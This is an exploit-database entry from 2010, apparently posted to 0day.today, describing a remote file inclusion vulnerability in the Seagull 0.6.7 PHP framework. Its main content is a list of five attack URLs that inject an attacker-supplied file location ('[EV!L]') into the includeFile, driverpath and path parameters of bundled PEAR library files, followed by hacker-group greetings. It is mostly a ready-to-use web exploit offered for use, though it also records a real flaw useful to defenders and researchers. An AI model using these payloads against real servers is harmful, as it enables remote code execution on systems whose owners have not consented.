id: 13910
date: 08/30/2010
title: Seagull 0.6.7 Remote File Inclusion Vulnerability
author: FoX HaCkEr
cves: 

=================================================
Seagull 0.6.7 Remote File Inclusion Vulnerability
=================================================

# Exploit Title : seagull-0.6.7 <===remote file inclode
 
# Date: 2010-08-29
 
# Author : FoX HaCkEr
 
#Contact : MKQ@HoTmAiL.CoM
 
# SiTe : www.sec4ever.com
 
# Download: http://seagullproject.org/
 
# Version:6.7
   
# Google dork: [sorry]
 
======================================================================================================
exploit :
 
http://localhost/fog/lib/pear/Config/Container.php?includeFile=[EV!L]
http://localhost/fog/lib/pear/DB/NestedSet.php?driverpath=[EV!L]
http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L]
http://localhost/fog/lib/pear/DB/NestedSet/Output.php?path=[EV!L]
http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L]
 
=======================================================================================================
 
Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz
Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in  MsN & ALL Members Sa-HaCkE



#  0day.today [2023-03-25]  #